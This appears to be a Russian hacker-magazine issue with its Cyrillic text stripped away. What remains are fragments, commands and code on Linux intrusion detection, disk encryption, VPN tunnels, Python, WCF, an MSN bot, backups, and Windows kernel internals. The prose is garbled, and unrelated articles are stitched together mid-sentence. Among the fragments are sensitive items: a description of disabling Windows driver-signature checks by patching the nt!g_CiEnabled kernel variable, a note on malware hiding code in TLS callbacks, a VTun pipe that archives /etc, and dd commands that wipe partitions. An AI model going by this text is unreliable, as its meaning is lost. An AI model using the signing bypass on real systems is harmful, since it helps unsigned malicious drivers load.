, FreeBSD Jail Linux
VServer ( ).

- - pidgin.
. ,
, ,
( root
, ). , Firefox,
.

, rkhunter
,


( /home ,
).
Linux- Yama (http://lkml.org/lkml/2010/6/23/25), Canonical.
Yama Ubuntu
:

.
, /tmp /var/tmp. ,
. Yama
, ,
, UID , , UID
.
.
,
, , .

. Yama
, .
ptrace.
ptrace, UID UID,
ptrace. ,


. Yama
ptrace -.


, ,
, , ? .
- ,

( ,
-, -


,
/etc/aide/aide.conf.d,
- .
AIDE,
aideinit:
$ sudo aideinit

/var/lib/aide
aide.db.new.
, :
$ sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

Chkrootkit
, ,
), , , ,
, , .
, ,
, ,
/, .
,
(
). ,
, HIDS
( ).
HIDS, UNIX-,
Tripwire,
AIDE (Advanced Intrusion
Detection Environment ). Tripwire, AIDE :
- ,
. :
AIDE
. -
, e-mail
.
AIDE
:
$ sudo apt-get install aide

$ sudo aide -c /etc/aide/aide.conf --check

AIDE cron,
. .
, AIDE, ,
AIDE
USB- (
aide.conf):
# cp /var/lib/aide/aide.db* /usr/bin/aide \
/etc/aide/aide.conf /etc/aide/aide.conf.d/* /media/

,
( , ..) . .
HIDS UNIX-
, .
chkrootkit rkhunter
(rkhunter
, ).
AIDE .
. :
$ sudo chkrootkit
$ sudo rkhunter --check

,
, ..
shell,
(awk, cat, grep, ) .
,
:

AIDE :
* /etc/default/aide
* /etc/aide/aide.conf

AIDE
. , ,
MAILTO , ( root).
,
( , ..)
, (/var/lib/aide/aide.db).


$ sudo chkrootkit -p /media/


$ sudo rkhunter --check --bindir /media/


. ,
, ,
. ,
, ,
,
, ,
. z

UNIXOID
zobni n@gmail.com


LUKS/dm-crypt, TrueCrypt EncFS

. -
,
,
. ,
,
.
Linux

,
,

:
1. loop-aes (http://loop-aes.sourceforge.net)
Linux-
loop.ko, loopback-,
.
2. LUKS/dm-crypt ,
Linux- dm-crypt
TKS1/TKS2.
3. TrueCrypt


.
4. EncFS ,
,
.
, ,
,
. loop-aes
, ,
,
( loop-aes,

). LUKS/dm-crypt,

,
,
2.5
. LUKS/dm-crypt
Linux-, ,
loop-aes,
. TrueCrypt, Linux
Windows-, LUKS/dm-crypt,
, ,
- ( TrueCrypt
Windows Mac OS X),
(

). EncFS ,

EncFS ,
EncFS
,
, .

, ,
, .

,
-
.
Watermark-,
(dm-crypt
CBC (Cipher Block
Chaining)), ,
ESSIV, LRW XTS).
,
, , AES-256, Serpent Twofish.
, USB-
-.
loop-aes, LUKS/dm-crypt TrueCrypt
EncFS.
,


, , ,
. EncFS
, , ,
. EncFS ,
:
,
,
EncFS,
(, curlftpfs, , encfs,

).

LUKS/DM-CRYPT
LUKS/dm-crypt,
, :
dm-crypt
Linux- 2.6, Device Mapper (dm),
, API (Crypto
API),
.
LUKS (Linux Unified Key Setup)

Linux,
. LUKS
, ,

. , HAL,

,
LUKS-, ,
, LUKS/
dm-crypt,
, .
LUKS/dm-crypt
.
LUKS-
cryptsetup-luks,
(, Ubuntu)
cryptsetup.
:
$ sudo apt-get install cryptsetup

, dm-crypt .
, :
$ sudo modprobe dm-crypt
$ sudo modprobe sha256
$ sudo modprobe aes

,
/etc/modules:
$ sudo -i
# printf 'dm-crypt\nsha256\naes\n' >> /etc/modules

, , (
, ):
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K


,
( ,
):

INFO

info
EncFS
Linux,
Mac OS X, FreeBSD
, ,
UNIX,

fuse.

EncFS Windows

www.assembla.com/spaces/wencfs.

WARNING
warning

/etc/updatedb.conf.
,

EncFS,

,


inode,

$ sudo dd if=/dev/random of=/dev/sda5 bs=4K



TrueCrypt
TrueCrypt

LUKS/dm-crypt
LUKS/dm-crypt ,
:
# dd if=/dev/urandom of=luks.img bs=1M count=100
# losetup /dev/loop0 luks.img
# cryptsetup luksFormat /dev/loop0 -c aes-cbc-essiv:sha256 -s 256
# cryptsetup luksOpen /dev/loop0 luks
# mkfs.ext2 /dev/mapper/luks
# mkdir /mnt/luks
# mount /dev/mapper/luks /mnt/luks

LUKS- cryptsetup:
$ sudo cryptsetup luksFormat /dev/sda5 \
-c aes-xts-plain -s 256

'-c' , AES-XTS (

CBC, ECB; Watermark-). '-s'
. cryptsetup , ,
. -
.
, ,
Device Mapper
(
dm-crypt
):
$ sudo cryptsetup luksOpen /dev/sda5

:
$ sudo mkfs.ext4 /dev/mapper/ -L
$ sudo mkdir /mnt/
$ sudo mount /dev/mapper/ /mnt/


,
,
/etc/crypttab /etc/fstab:
$ sudo -i
# echo " /dev/sda5 none luks,cipher=aes-cbc-essiv:sha256" >> /etc/crypttab
# echo "/dev/mapper/ /mnt/ ext4 defaults 0 0" \
>> /etc/fstab


,
.

,
/etc/fstab , /home.
/etc/crypttab /etc/fstab . HAL
LUKS-
(Gnome, KDE,
XFCE), , ,
. ,

:
$ sudo chown -R : /media/
$ sudo chmod g+s /media/

, ,
( '-L' mkfs).
LUKS/dm-crypt ( , )
. , .
LUKS luksAddKey cryptsetup:
$ sudo cryptsetup luksAddKey /dev/sda5

,
. , :
$ sudo cryptsetup luksDelKey /dev/sda5 ID-

Device Mapper
:
$ umount /mnt/
$ cryptsetup luksClose sda5



:
$ sudo cryptsetup luksDump /dev/sda5

TrueCrypt

LUKS/dm-crypt
LUKS/dm-crypt ,
swap-:

TrueCrypt

# swapoff -a
# cryptsetup -d /dev/urandom create cryptoswap /dev/sda1
# mkswap /dev/mapper/cryptoswap -L accessisdenied -v1
# echo "cryptoswap /dev/sda1 /dev/urandom swap" >> /etc/crypttab
# echo "/dev/mapper/cryptoswap none swap sw 0 0" >> /etc/fstab
# swapon -a

,
USB- .
dd:
$ dd if=/dev/urandom of=/// bs=512 count=4

LUKS-:
$ sudo cryptsetup luksFormat -c aes-xts-plain -s 256 \
/dev/sda5 ///

:
$ sudo cryptsetup -d /// luksOpen \
/dev/sda5

TRUECRYPT
TrueCrypt
Windows 2004 , Linux ( 4.0), 2008 ,
TrueCrypt 5.0 Windows,
Linux.
TrueCrypt
, .
, LUKS, Linux- TrueCrypt
dm-crypt, , , fuse
/.
TrueCrypt
LUKS, .
-, TrueCrypt - ,
Windows, Mac OS X Linux, ,
( LUKS- Windows
FreeOTFE, ). , TrueCrypt

, ,
. -, TrueCrypt ,
, (LUKS, ,
, ). -, TrueCrypt

(LUKS ).
( TrueCrypt
) TrueCrypt
, :
$ cd /tmp
$ wget http://www.truecrypt.org/download/truecrypt-6.3a-linux-x86.tar.gz
$ tar -xzf truecrypt-6.3a-linux-x86.tar.gz
$ ./truecrypt-6.3a-setup-x86


( ). TrueCrypt
/usr,
(, ,
truecrypt-uninstall.sh).
truecrypt
.
/, ,
: (Create
Volume), , ,
.. Create Volume .
, (
), ( ),
, , ,
, (FAT, Ext2 Ext3) ..
. , ,
Select File , , -


EncFS
, .
/tmp: crypted
EncFS, decrypted :
$ cd /tmp
$ mkdir crypted decrypted

EncFS:
$ encfs /tmp/crypted /tmp/decrypted

TrueCrypt

.
.
Dismount All .
,
TrueCrypt :
, '-t'.

. truecrypt -t -c
. (
TrueCrypt' ), :
$ truecrypt -t /// //

. :
EncFS . : expert
( x) paranoid ( p). ,
(AES Blowfish), ,
, Initialization Vector ( , ,
<Enter> ) .. paranoid

.
, ,
paranoid , expert
. ,
Blowfish AES, , .
1024
, EncFS .
4096 x86.
.
decrypted :
$ cd decrypted
$ echo qwerty > file1
$ echo asdfgh > file2
$ echo zxcvbn > file3

EncFS :
$ cd ..
$ fusermount -u /tmp/decrypted
$ cd crypted
$ ls

'-d':
$ truecrypt -d

, TrueCrypt LUKS
.
XTS, LUKS.

AES, Twofish Serpent, .
, TrueCrypt
,
.

ENCFS
EncFS ,
fuse , libfuse, OpenSSL . EncFS
:
$ sudo apt-get install encfs


, EncFS ,
. , EncFS
, .encfs .
,
(, ), MAC (Message authentication
code) .

?
Linux .
,
LUKS/dm-crypt,
/
. , LUKS/dm-crypt
,
. .
LUKS/dm-crypt loop-aes
TrueCrypt,
, EncFS,
(, ). z

UNIXOID
grinder grinder@tux.in.ua

VPN

VPN-
,
- ,
LAN, ,
VPN. , ,

. , OpenSource.
VTUN
,

TCP/IP . (vtun.sf.net) VTun:
(
6 2007 ).
,
,
, VTun
*nix : Linux,
*BSD Solaris. Debian/Ubuntu:
$ sudo apt-cache search vtun
vtun - virtual tunnel over TCP/IP
networks

VTun IP, PPP, SLIP, Ethernet, TTY


pipe.
TCP UDP.
128-
BlowFish,
OpenSSL.
zlib lzo.

,

CPU . VTun
- .

( 5000 ), .

. VTun
,
.
NAT, VTun
,

TCP. ,
.

tun tap,
(userspace) . ,
, :
$ ls -al /dev/net/tun
crw-rw-rw- 1 root root 10, 200 2010-07-10 12:39 /dev/net/tun

,
CONFIG_TUN
CONFIG_ETHERTAP.
vtun Debian/Ubuntu:
$ sudo apt-get install vtun


/etc/vtund.conf.
,

.
, .
VTun.
. options default
,
:
$ sudo nano /etc/vtund.conf
options {
  port 5000;
  syslog daemon;
  # Paths to the helper programs
  ifconfig /sbin/ifconfig;
  route /sbin/route;
  ip /sbin/ip;
  firewall /sbin/iptables;
}
default {
  compress lzo:9; # LZO compression, level 9
  speed 0; # no bandwidth limit
}
# Session description
client1 {
  passwd p@ssVV0rD;
  # Tunnel type: tun, ether, tty, pipe
  type tun;
  proto udp;
  encrypt yes;
  # speed 256:128;
  keepalive yes;
  # Commands run when the connection comes up
  up {
    ifconfig "%% 10.1.0.1 pointopoint 10.1.0.2 mtu 1450";
    # firewall "-t nat -A POSTROUTING -s 10.1.0.2 -j MASQUERADE";
  };
  # Commands run when the connection goes down
  down {
    firewall "-t nat -F";
    ifconfig "%% down";
  };
}

Ubuntu
Debian/Ubuntu
/etc/default/vtun.
:

VTun

HTTP://WWW
links
VTun
vtun.sf.net
tinc
tinc-vpn.org

n2n ntop.org/n2n
socat
www.dest-unreach.org/socat/
CIPE
sites.inka.de/bigred/devel/cipe.html

up down, ,
VPN. , ,
, , .
, :
program /bin/sh "-c 'tar cf - /etc/*'";


$ sudo nano /etc/default/vtun


#
RUN_SERVER=yes

:
$ sudo invoke-rc.d vtun start

, ,
:
$ sudo vtund -s

, , , :
$ sudo nano /etc/vtund.conf
options {
port 5000;
timeout 60;
ifconfig /sbin/ifconfig;
route /sbin/route;
firewall /sbin/iptables;
}
client1 {
passwd p@ssVV0rD;
type tun;
up {
ifconfig "%% 10.1.0.2 pointopoint 10.1.0.1 mtu 1450";
route "add -net 1.2.3.4/16 gw 10.1.0.1";
};
}

Debian-based , /
etc/default/vtun, init- , .
$ sudo nano /etc/default/vtun
CLIENT0_NAME=client1
# IP VTun
CLIENT0_HOST=vtun.mydomain.ru

vtund , , IP- ()
:

tinc.conf

tinc

$ sudo vtund - client1 vtun.mydomain.ru

, :

( /etc/tinc). VPN
, ,
tinc.conf:

$ sudo tail -f /var/log/messages

ifconfig tun0 .
Vtun .
init-:
$ sudo invoke-rc.d vtun start

TINC

VPN - tinc (tinc-vpn.org).
( 1998 ), . VTun,
tinc IPv4/IPv6 ,
: Linux, *BSD, Mac OS X,
Solaris, Windows 2k-Se7en. , , iPhone, iPod.
OpenSSL, zlib lzo.
tinc Ethernet
, , , ,
. ,
.
, VTun, tinc TUN/TAP. tinc
.
Windows . Debian/Ubuntu :
$ sudo apt-get install tinc

, .
, ,
, . . /etc/tinc/net.boot
, tinc.
( ), :
$ sudo nano /etc/tinc/net.boot
vpnnet

/usr/share/doc/tinc/examples .
/etc/tinc .
VPN-,
. , /etc/tinc/vpnnet, vpnnet.
VPN
-, ,
. VPN- ,

$ sudo nano /etc/tinc/vpnnet/tinc.conf


#
Name = my_vpn
# ,
# ConnectTo
ConnectTo = vpn01
#
Device = /dev/net/tun
# VPN: router|switch|hub
Mode = switch
PrivateKeyFile = /etc/tinc/vpnnet/rsa_key.priv
#
BindToInterface = eth1
# , ,
# DirectOnly = yes
#
# Forwarding = <off|internal|kernel>

. .
hosts,
: my_vpn vpn01.
$ sudo nano /etc/tinc/vpnnet/hosts/my_vpn
# IP
Address = 1.2.3.4
# ,
Subnet = 192.168.1.0/24
# TCP
# TCPOnly = yes

,
.
$ sudo nano /etc/tinc/vpnnet/hosts/vpn01
Address = vpn01.mydomain.ru

tinc 655;
, , Port.
, ( ).
:
$ sudo tincd -n vpnnet -K


supernode

anytun
man-

,
.
,
/ VPN: tinc-up/tinc-down, host-up/host-down, subnet-up/subnet-down.
, .

.
Linux, *BSD, Mac OS X, Windows ( GUI)
OpenWRT TUN/TAP-.
Debian/Ubuntu :

$ sudo nano /etc/tinc/vpnnet/tinc-up


#!/bin/sh
modprobe tun
ifconfig $INTERFACE 192.168.1.10 netmask 255.255.255.0

supernode
edge. N2N . supernode,
'-l' , .
'-v'. :
.

, :
$ sudo /etc/init.d/tinc start

, ifconfig
. - ,
:
$ sudo tincd -n vpnnet -d5 -D

N2N
N2N (network to network, ntop.org/n2n) ,
VPN- .
P2P-,
.
(Edge Node)
. UDP-. supernode,
, Edge Node
. supernode , ,
. , VPN.
supernode
. Supernode Edge
Node, .

( supernode),
. ,
N2N . ,
, . ,
N2N , VPN,


$ sudo apt-get install n2n

$ supernode -l 7654 -v

VPN- edge,
. :
-a IP-, VPN-;
- ;
-k VPN-;
-l supernode.

, supernode node1 node2.


:
node1$ sudo edge -a 10.1.2.1 -c mynetwork -k encryptme -l 1.2.3.4:7654
node2$ sudo edge -a 10.1.2.2 -c mynetwork -k encryptme -l 1.2.3.4:7654

Registering with supernode,


ifconfig edge0 . , , ,
IP. :
-h HTTP- ( );
-r / (
Edge Node, );
-f ;
-d TAP- (

CIPE

: OpenVPN
HMM3

VPN
anytun-0.3.3.tar.gz 110
vtun-3.0.1.tar.gz 122
cipe-1.6.0.tar.gz 139
tinc-1.0.13.tar.gz 497
n2n_svn_23072010.tgz 535
socat-1.7.1.2.tar.gz 542
openvpn-2.1.1.tar.gz 860

Anycast
VoIP .
, VPN
.
Anycast- ,
- . VPN
anycast, , , unicast anycast-, SATP (Secure Anycast Tunneling Protocol).
SATP anytun (anytun.org).
Quagga,
UDP anycast NAT. . ,
, man .

CIPE (Crypto IP Encapsulation, sites.inka.de/bigred/devel/cipe.html) .
CIPE ( CIPEv3) IP- UDP-, . cipcbx.
128- (Blowfish, IDEA),
. CIPE
, .
CIPE NAT
SOCKS,
. , ,
GRE .
CIPE Linux,
WinNT4.0 SP3/SP6, Win2k (cipewin32.sf.net).
(
2002 ), , CIPE . , Ubuntu cipe-common
cipe-source 6.06 (Dapper Drake),
CIPE
.

: (UDP, TCP,
UNIX, IP4, IP6, raw), , ,
, . socat
TCP- , Unix-, .
, SSL socat.
, .
Debian/Ubuntu , .
EXAMPLES, ,
. TUN-,
5555:
$ sudo socat -d -d TCP-LISTEN:5555,reuseaddr TUN:192.168.1.1/24,up

, TCP-
:
$ socat TCP:1.2.3.4:5555 TUN:192.168.1.2/24,up

ifconfig tun0 .
SSL . :
).

, P2P VPN,
P2PVPN (p2pvpn.org).
. Java
, Java RE.
32- Linux Windows.
RSA (1024 ), AES (128 ).

NETCAT SOCAT
, , , TCP/UDP- , / , netcat.
. ( 2004 ), ()
: OpenBSD netcat, Ncat, Cryptcat, socat.
, socat (www.dest-unreach.org/socat/)

$ sudo socat openssl-listen:4444,reuseaddr,cert=/etc/vpn/server.pem,cafile=/etc/vpn/client.crt echo

:
$ sudo socat stdio openssl-connect:example.ru:4444,cert=/etc/vpn/client.pem,cafile=/etc/vpn/server.crt

, socat Linux, *BSD, OpenSolaris, Mac OS X Cygwin.

. , VPN. ,
.z


CODING
akrasnoschekov@gmail.com

PYTHON
-

Python
:).
, ,
, ,
.
?! !

-, , , ,
. , ,
,
. , ,
:). -, , - . .
- ... , , .
:
( )
#include <cmath>
#include <iostream>
using namespace std;

// Area of a circle of radius r
double area_of_circle(double r) {
    return M_PI * pow(r, 2);
}

int main() {
    double r = 5;
    cout << ": " << area_of_circle(r) << endl;
}

:
( )
#include <cmath>
#include <iostream>
using namespace std;

class Circle {
    double r;
public:
    Circle(double r) { this->r = r; }
    double area() { return M_PI * pow(this->r, 2); }
    void print_area() {
        cout << ": " << this->area() << endl;
    }
};

int main() { (new Circle(5))->print_area(); }

-... , ( ), - ( ).
- , , C++
.
( , ),
.

, , , .
,
,
, , .

, , .
:
:
.
/ .

- .
: Haskell, Erlang, F#

DVD
dvd


.
:).

. !
.
(
), .

,
.
:
, -
.
.

.
: Prolog

, , , .
:
Prolog
{ }
witch(X) <= burns(X) and female(X).
burns(X) <= wooden(X).
wooden(X) <= floats(X).
floats(X) <= sameweight(duck, X).
{ }
female(girl).
sameweight(duck,girl).
{ }
? witch(girl).

,
- ,
. .
,
.
, , .
f(x),
x .
,
,
.

, , . :).
data :

data = [...]
sum = 0
for element in data:
    sum += element ** 2
print sum

data = [...]
sq = lambda x: x**2
sum = lambda x,y: x+y
print reduce(sum, map(sq, data))

,
. ,

.
Lisp, ( , ?).

.
,
( ) .
,
,
.

,
. .

HTTP://WWW
links

,

:
http://www.python.org
http://en.wikipedia.org/wiki/Programming_paradigm
http://www.ibm.com/developerworks/library/l-prog.html

INFO

info
,


Lambda , ,
.
.
- :
.
. map, reduce



, ( )
( map) ( reduce).
, .
Lambda-
def add(n):
    return lambda x: x + n
adds = [add(x) for x in xrange(100)]

.
. , ,
.

. : print length([5, 4/0, 3+2]).
, .

, .
!
.
, .

adds[34](5)

, .

.
,
. lambda x.
-
, .
,
. ,
. ,
, , , .

() , ,

.
.
,
,
.
,
. ,
.
, ,
.
:
-, ,
,
.
,
.
-, , . ,


,
,
syntactic sugar.
,
, .
, adds = [add(x)
for x in xrange(100)].
. , ?
, and or, if-elif-else.
, .

L = []
for x in xrange(10):
    if x % 2 == 0:
        if x**2>=50:
            L.append(x)
        else:
            L.append(-x)
print L

print [x**2>=50 and x or -x for x in xrange(10) if x%2==0]

,
, , . , ... .
, , , ,
, . .
, ,
.z

CODING
c0n Difesa condifesa@gmail.com, http://defec.ru

[Figure: Windows Communication Foundation (WCF); labels: Enterprise Services, .NET Remoting, Messaging, Web Services, WSE]

WTF WCF?

Windows Communication Foundation:


-
. Cloud Computing ,

,
.
.
.NET Framework.
.NET Remoting ,
. Microsoft ,
,
-. ,
.
,
Remoting, Windows Communication
Foundation, , , .NET Framework.
,
-,
,
-


. ,
, cloud computing , ,
,
. ,
?
WCF.
-.
, WCF WEB HTTP,

- :
// (GET POST), (URI),
( XML, AJAX JSON,
SOAP). , .
-
:
. ,


.
,
(, , , ) , .
WCF
, .


.

: SOAP REST.
SOAP (Simple Object Access Protocol)
,
.
.NET Remoting.
SOAP .
,
.
GetBalance(int AccountID)
. HTTP-
:
SOAP-
// HTTP-

SOAPAction: GetBalance

//SOAP-
<soap:Envelope xmlns:soap >
  // SOAP-
  <soap:Body>
    <GetBalance xmlns = >
      <Account>2</Account>
    </GetBalance>
  </soap:Body>
</soap:Envelope>

SOAP- . REST (Representational State Transfer)


SOAP.
, HTTP, URI, XML.

, SOAP,
, URI.
/ -

RESP
HTTP (GET, POST, PUT, DELETE).
URL, : www.servicesite.com/Accounts/2.
, ,
URL, .
,
,
.

REST-
,

SOAP
,


-, SOAP-,

.
SOAP:
XML- , . REST
.
,
, ,
. , grid-, MD5-, ,
MD5- ,
.
WCF ,
.

DVD
dvd

.

.

HTTP://WWW
links
www.xakep.ru/post/52434/
.NET Remoting:

grid-.
www.techdays.ru/

,

WCF.
http://defec.ru
,

.


, ,
. , ,
(/) .

SOAP

MICROSOFT

WCF- WCF-
. ,
, - . ( Remoting!)
( ). WCF- ,
, ,
,
.
, ( ), .


WCF-
WCF-

: HTTP, TCP,
MSMQ . WCF SOAP. ,
, REST-.
Windows Communication Foundation :
1. (Address);
2. (Binding);
3. (Contract).

. . , , .
URI (
, , ).
, , (,
TcpTransportBindingElement TCP),
(
ReliableSessionBindingElement)
SOAP- (
SecurityBindingElement). , ,
, .


WCF- ,

.

ServiceContractAttribute ( Remoting).
, ,
,
OperationContractAttribute. ,
:

[ServiceContract]
public interface AddIntPoint
{
    [OperationContract]
    int Add(int x, int y);
}


, :

public class AddService : AddIntPoint
{
    public int Add(int x, int y)
    { return x + y; }
}

AddService WCF-
.
. ,
, PasswordCrack (string MD5hash),
. ,
( -
), WCF-
.
:

public class WCFServiceApp
{
    // Define the endpoint in code
    public void DefineEndpointImperatively()
    {...}
    // Define the endpoint in the configuration file
    public void DefineEndpointInConfig()
    {...}
}

DefineEndpointImperatively() , , HTTP :
...
ServiceHost sh = new ServiceHost(typeof(AddService));
sh.AddServiceEndpoint(
    typeof(AddIntPoint),
    new WSHttpBinding(),
    "http://localhost/AddService/Ep1");
sh.Open();
...

WCF

AddIntPoint :
public class WCFClientApp
{
    // Send a message to the endpoint
    public void SendMessageToEndpoint()
    {
        MathProxy proxy = new MathProxy();
        int result = proxy.Add(35, 7);
    }
}


. ,
,
,
() .

.
, ,
,
. .
, ,
/
( ,
..). WCF-
IIS- (

-,
).
, HTTP.

, ?

WCF :
, , .
, Windows Communication
Foundation, .
.
- ( ) ,

.
. ,
, :
?. , , . , . , ? :

, - . ,

, .

, WCF-
, .
,

.
.z


CODING
www.flenov.info

MSN-


IM-

IM- ? , .
? , MSN. , ( ,
), . ,
,
.
?

-,
(, )
, .
( ) Microsoft Messenger, ,
. Microsoft
, ,
, , MS, .
.
,
MSNPSharp (http://code.google.com/p/msnp-sharp/).
,
, MSN-.
MSNPSharp, .


, . , , :
1. ;
2. - ,
.
, ;
3. - ,
.


,
. (
, ),

. ,
MSN .

Messenger,
:
Messenger messenger = new Messenger();

. MSNPSharp . ,
,
.
. ,
.
, , .
, , .
. ,
:
NameserverProcessor.ConnectionEstablished , ;
Nameserver.SignedIn ;
Nameserver.SignedOff ,

. ,
. , *nix-.
,
.
, .
, .
, MSN-
, .
- ,
.
, . , -
, . , MSN,
Nameserver . ,
AddNewContact ContactService. ?
, :
messenger.Nameserver.ContactService.AddNewContact("pamela_anderson@hotmail.com");

, . ContactList, .
, All (ContactList.All).
:
Allowed ;
BlockedList ,
.


-, ;
Nameserver.AuthenticationError ;
ConversationCreated
.

, . .
, . Credentials, .
Credentials
. , ,
, :

,
. ,
. , AutoSynchronize true:
messenger.Nameserver.AutoSynchronize = true;

,
AutoSynchronize
ConnectionEstablished.
.

, SignedIn,
. ,
, online :
messenger.Owner.Status = PresenceStatus.Online;

messenger.Credentials = new Credentials(
    "youaccount@hotmail.com", "qwerty");


,
Connect();.

, . - ,
, invite ,
.
,
e-. , , ,

,
PresenceStatus.Busy. ,
, -,
, .
. .
,
Conversation:
Conversation conversation =
messenger.CreateConversation();

,
ConversationCreated. ,


MSNPSharp

,
, .
, messenger- , , MsnAccountTo:
private void messenger_ConversationCreated(
    object sender, ConversationCreatedEventArgs e)
{
    if (e.Initiator != null)
    {
        foreach (MSNPSharp.Contact contact in messenger.ContactList.All)
        {
            if (contact.Mail == MsnAccountTo)
            {
                e.Conversation.ContactJoined +=
                    new EventHandler<ContactEventArgs>(ContactJoined);
                e.Conversation.Invite(contact);
                return;
            }
        }
        messenger.Nameserver.ContactService.AddNewContact(MsnAccountTo);
    }
}

, .
- ,
, .
Conversation .
ContactJoined , , :
e.Conversation.ContactJoined +=
new EventHandler<ContactEventArgs>(ContactJoined);

Invite :
e.Conversation.Invite(contact);


. ConversationCreated . ,
, . , ,
,
. , .
.
,
ContactJoined. . , :
private void ContactJoined(object sender, ContactEventArgs e)
{
    TextMessage message = new TextMessage(currentmessage);
    (sender as Conversation).SendTextMessage(message);
}

.
TextMessage.
.
Conversation,
, . ,
SendTextMessage
.
Conversation , .
, Conversation .

. , MSN
, Skype,
, .
-,
, , .
. z

CODING
stannic.man@gmail.com

: ( )

?
? ,
,
Alt+TAB? ,
, ?
? !
? .
, Driver Signature Enforcement, , TLS Thread
Local Storage,
PE-.

- Driver Signature
Enforcement

, Windows Vista, Microsoft


( )
( Vista 64- ).
, , ,
. , , .
Windows Vista/7 ,
, Verisign
Thawte.
- . , , ,
. ,
, ,
.
,
. , ,
, Driver Signature Enforcement.
ci.dll, , , /%systemroot%/system32.
:

CiCheckSignedFile
CiFindPageHashesInCatalog
CiFindPageHashesInSignedFile
CiFreePolicyInfo
CiGetPEInformation
CiInitialize
CiVerifyHashInCatalog

CiInitialize,
, :
VOID SepInitializeCodeIntegrity()
{
    ULONG CiOptions;
    {snipped...}
    memset(g_CiCallbacks, 0, 3 * sizeof(SIZE_T));
    CiOptions = 4 | 2;
    if (KeLoaderBlock)
    {
        if (*(ULONG*)(KeLoaderBlock + 84))
        {
            if (SepIsOptionPresent((KeLoaderBlock + 84),
                    L"DISABLE_INTEGRITY_CHECKS"))
                CiOptions = 0;
            if (SepIsOptionPresent((KeLoaderBlock + 84),
                    L"TESTSIGNING"))
                CiOptions |= 8;
        }
        CiInitialize(CiOptions, (KeLoaderBlock + 32),
            &g_CiCallbacks);
    }
}

F8 Vista

, CiInitialize
:
g_CiCallbacks[0] = CI!CiValidateImageHeader,
g_CiCallbacks[1] = CI!CiValidateImageData,
g_CiCallbacks[2] = CI!CiQueryInformation.


:
nt!SepInitializeCodeIntegrity
nt!SepInitializationPhase1 + 0x1a1
nt!SeInitSystem + 0x29
nt!Phase1InitializationDiscard + 0x7ce
nt!Phase1Initialization + 0xd
nt!PspSystemThreadStartup + 0x9e
nt!KiThreadStartup + 0x19

, SepInitializeCodeIntegrity ( ,
CiInitialize)
. CiInitialize,
, , Boot Driver List ( , ).
,
.
.
Vista/7 :
nt!MmLoadSystemImage
nt!MiObtainSectionForDriver
nt!MiCreateSectionForDriver
nt!MmCheckSystemImage


Windows Boot Manager 0xc0000428


tcpip.sys
nt!NtCreateSection
nt!MmCreateSection
nt!MiValidateImageHeader
nt!SeValidateImageHeader
nt!_g_CiCallbacks[0] .. CI!CiValidateImageData

SeValidateImageHeader ,
.
:
nt!g_CiEnabled ( , ,
:)) , TRUE,
nt!g_CiCallbacks[0].
NULL, .
nt!g_CiCallbacks[0] , 0xc0000428,
Windows cannot
verify the digital signature of this file.
nt!g_CiEnabled FALSE,
, ,
STATUS_SUCCESS. !
Windows Vista / 7 , .
: , ,
. -
,
. , ,
nt!g_CiEnabled, nt!g_CiCallbacks
.

RTFM

TLS? Thread Local Storage,


,
Windows.
,
.
TLS
, .

, ...

, -,
?

, . ,
, ,
, TLS. , .
. , ? ,
ThreadProc
. TLS?
?
TLS Windows
, , kernel32 (TlsGetValue, TlsSetValue, TlsAlloc TlsFree), ,
,
, __declspec(thread) . :
?. : TLS
Windows
Vista , __declspec(thread)
, LoadLibrary(Ex),
Access Violation. ? ,
__declspec(thread) .
DLL
__declspec( thread ), . DLL
LoadLibrary ,
__declspec( thread ).
,
, ,
DLL. LoadLibrary
,
__declspec (thread).
DLL API TLS, TlsAlloc, TLS,
DLL LoadLibrary.

, , . ? TLS ? !
PE- (TLS-callback),

. ,
. PE-
, TLS . , , ,
.
TLS , , ,
crackme ,
. Blacklight ,
callback TLS (Thread Local Storage).
Blacklights TLS callback ,
(fork) , .
TLS-,
( DLL),
shell-.
,
, ,
. directory table.
, TLS .
TLS (http://www.xakep.ru/magazine/xa/118/080/1.asp).

, . ? .
:). , ,
][, ! z

SYN/ACK
dhsilabs@mail.ru


LIVEDVD/LIVEUSB
( )
Norton Ghost. Windows (
. .).
.
, , LiveCD/DVD.
?
, LiveCD.
, LiveCD?
, .
:
. ,
, ,
. -
. ? LiveCD,
. , LiveCD (,
LiveDVD,
LiveCD)
. ! . . ,
tar/tgz. 40 ,
, . .
.
, , , ( , ,
,
:)). ,
. 10, 20, 50! .
, LiveCD
.
( + ),
LiveCD 30 (
, ),
. , ,
LiveCD, .

40 , N ,
N . ? ,
. LiveCD . 10
= 15 ( ). 10
. ,
, . , !
, .
LiveUSB / , DVD -. LiveCD
.
, LiveCD
/ .
/home,
DVD-.
( ), .

?

Clonezilla. LiveCD, . http://clonezilla.org
: 10 Clonezilla SE
5,6 41 .
10 . ,
, . ,
Clonezilla ,
Windows FreeBSD.
, Remastersys Backup (http://www.geekconnection.org/remastersys/).
, Debian Ubuntu (
, Debian),
, , , Fedora Mandriva.
Slackware Linux Live (http://www.linux-live.org). LiveCD, LiveUSB.
Slackware ?
-
Ubuntu.
, , mklivecd ( Remastersys Backup)
LiveCD Mandriva. , ,
.
- .

CLONEZILLA: NORTON GHOST


Clonezilla ,
( LiveCD
),
.
, / :
1. http://clonezilla.org/download/sourceforge/ ISO-
Clonezilla Live ;
2. Clonezilla Live,
. Clonezilla live.
(, ), Other modes of
Clonezilla live Clonezilla.
Debian , ;
3. . , , . ,
( ?), Don't
touch keymap;
4. Start Clonezilla;
5. device-image: .
device-device ,
;
6. , ,
( ). local_dev, .
( ) SSH, NFS (Network File System, Need For Speed!)
MS Windows (samba_server);
7. , .
, , , Clonezilla ;
8. . savedisk
, saveparts
, restoredisk
, restoreparts
, recovery-iso-zip
;
9. ,
, ;
10. ( Linux), . ,
!
11. recovery-iso-zip LiveDVD/USB,
: iso
DVD, zip LiveUSB, both
,
LiveDVD, LiveUSB. ()
/home/partimag.
! , .
(, ) , /
,
.

REMASTERSYS BACKUP: DEBIAN/UBUNTU


Clonezilla, ,
Remastersys Backup ,
Debian Ubuntu,
ISO- ,
.
Remastersys : , Remastersys, Remastersys,
ISO-, .
Remastersys. sources.list:
sudo nano /etc/apt/sources.list

:
# GRUB v1
deb http://www.geekconnection.org/remastersys/repository ubuntu/
# GRUB2
deb http://www.geekconnection.org/remastersys/repository karmic/

Clonezilla Live

:
sudo apt-get update
sudo apt-get install remastersys

remastersys :
sudo remastersys backup|clean|dist [cdfs|iso] [filename.iso]

:
backup , ( /home);

Clonezilla

(
GPL);
